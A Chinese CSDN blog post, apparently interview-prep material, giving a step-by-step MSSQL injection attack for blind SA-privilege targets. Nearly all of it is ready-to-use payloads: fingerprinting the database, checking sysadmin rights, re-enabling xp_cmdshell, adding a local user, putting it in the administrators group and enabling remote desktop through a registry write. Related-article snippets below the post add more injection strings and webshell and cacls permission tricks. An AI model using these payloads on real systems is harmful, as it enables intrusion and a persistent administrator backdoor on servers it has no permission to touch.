MSSQL注入SA权限不显错模式下的入侵

最新推荐文章于 2022-02-16 20:25:48 发布
最新推荐文章于 2022-02-16 20:25:48 发布
阅读量120 收藏
点赞数
分类专栏: 网安工程师面试篇 sql注入 网络安全工程师面试篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118281076
版权

第一步判断是不是微软的sqlserver 数据库
and exists (select * from %20 sysobjects )
第二步查询当前数据库系统用户
and system_user=0
第三步检查权限是否为SA
and 1 =(slect IS_SRVROLEMEMBER(‘sysadmin’))
第四步判断一下xp_cmdshell 存储过程是否存在
and 1=(select count (*) from master.dbo.sysobjects where name = ‘xp_cmdshell’)
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。
默认不存在恢复xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;–
第五步执行xp_cmdshell 扩展存储添加账号
;exec master…xp_cmdshell ‘net user test test /add’
把添加的账号添加到管理员组
;exec master…xp_cmdshell ‘net localgroup administrator test /add’
开启远程3389
;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–

安全界 的彭于晏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常用SQL注入语句
chengjingdeni的专栏
08-07 488
<br />     在对web应用进行渗透测试时,SQL注入无疑是最重要的检测项之一,下面就对常用的SQL注入语句进行一个归纳总结,便于在进行渗透<br />测试时使用。<br />1.判断有无注入点<br />; and 1=1 and 1=2<br /><br />2.猜表一般的表的名称无非是admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) f
sa权限(MSSQL注入SA权限不显错模式下的入侵
Coisini的博客
05-27 2158
内容:MSSQL注入SA权限不显错模式下的入侵 一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和...
大型网站攻防
mengzaifei6的专栏
04-24 835
判断数据库类型 1.网站注入点后面加上 and user>0           如果返回Microsoft OLE DB Provider for SQL Server 错误 '80040e07'   为MS SQL 数据库           如果返回Microsoft OLE DB pROVIDER FOR  ODBC Driver 错误 '80040e10'  为Access数据库
数据库表的设计注意事项有哪些?三大范式是哪些?
最帅程序猿的博客
01-11 1018
数据库设计的注意事项: **字段的原子性:**保证每列的原子性,不可分解,能用一个字段表达清楚的绝不使 用第二个字段。 **主键设计:**主键不要与业务逻辑有所关联,最好是毫无意义的一串独立不重复的 数字。 **字段使用次数:**对于频繁修改的字段(一般是指状态类字段)最好用独立的数字 或者单个字母去表示,不用使用汉字或长字符的英文。 字段长度:建表的时候,字段长度尽量要比实际业务的字段大 3-5 个字段左右, 最好是 2 的 n 次方幂值。 关于外键:尽量不要建立外键,保证每个表的独立性。 动静分离:最好
[提权禁区] SQL语句利用xp_cmdshell获取权限
weixin_34023982的博客
03-27 418
判断权限是不是sa select is_srvrolemember('sysadmin') 返回是1说明是sa 判断xp_cmdshell扩展存储是否存在 select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell' 返回为l则证明存在 ...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
MySQL在不知道列名情况下的注入详解
09-09
MySQL在不知道列名情况下的注入详解是一篇关于数据库安全和SQL注入技术的文章,主要针对MySQL数据库。SQL注入是一种常见的安全漏洞,允许攻击者通过输入恶意的SQL语句来获取、篡改或删除数据库中的数据。当列名未知...
SQL Injection with MySQL 注入分析
09-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统,如MySQL。此技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库的SQL注入问题,以及...
mysql5 注入漏洞
10-30
6. **防火墙和入侵检测系统**:使用防火墙规则和入侵检测系统来阻止已知的SQL注入攻击模式。 7. **代码审计**:定期进行代码审查,检查是否有潜在的SQL注入漏洞。 通过这些措施,开发者可以显著提高应用程序的安全...
MySQLSQL 注入
12-16
MySQLSQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
SQL注入不能多句执行时的一种突破方法(SA权限
weixin_34405557的博客
01-29 136
有时候会遇到SA权限不能多句执行的情况,让人很蛋疼。 前几天在搞一个SQL SERVER 7.0的PUBLIC权限时。 某牛给我以下语句提权 select * from openrowset('sqloledb','dsn=locaserver;trusted_connection=yes','set fmtonly off exec master..xp_cmdsh...
SQL注入之Mssql注入
qq_57307348的博客
02-16 5443
sql注入之mssql注入基础
mssql注入sa权限被降为network service 得到webshell方法
Civil_War的专栏
07-19 2139
如果sa只有network service 权限,网上能搜索到的那些提权方法都是不能用的,这个内置账户的权限相当于USER.如果你无法通过数据库备份或通过SP_makewebtask得到webshell,可以这么做:xp_cmdshell可以cacls d: /e /t /g n
当注入拥有sa权限,提升webshell权限
大海的专栏
03-29 2453
 当注入拥有sa权限,提升webshell权限!修改权限为完全控制  程序代码eg: cacls d:/test /t /e /G everyone:f修改权限为只read 程序代码cacls d:/web/index.asp /e /t /P everyone:rCacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileNam
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1883
当注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
各种常用默认的端口号
热门推荐
安全界的彭于晏的博客
06-21 1万+
端口号的范围是从1~65535。其中1~1024是被RFC 3232规定好了的,被称作“众所周知的端口”(Well Known Ports);从1025~65535的端口被称为动态端口(Dynamic Ports),可用来建立与其它主机的会话,也可由用户自定义用途。 一些常见的端口号及其用途如下: 无效端口,通常用于分析操作系统 1 传输控制协议端口服务多路开关选择器 2 管理实用程序 3 压缩进程 5 远程作业登录 7 回显 9 丢弃 11 在线用户 13
PHP+MySQL注入详解与防范策略
SQL Injection with MySQL 注入分析是一篇由作者angel原创的IT技术文章,主要针对国内相对较少见的php+MySQL编程环境下的SQL注入问题进行深入探讨。随着Web应用程序的发展,SQL注入已经成为一种常见的安全漏洞,尤其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值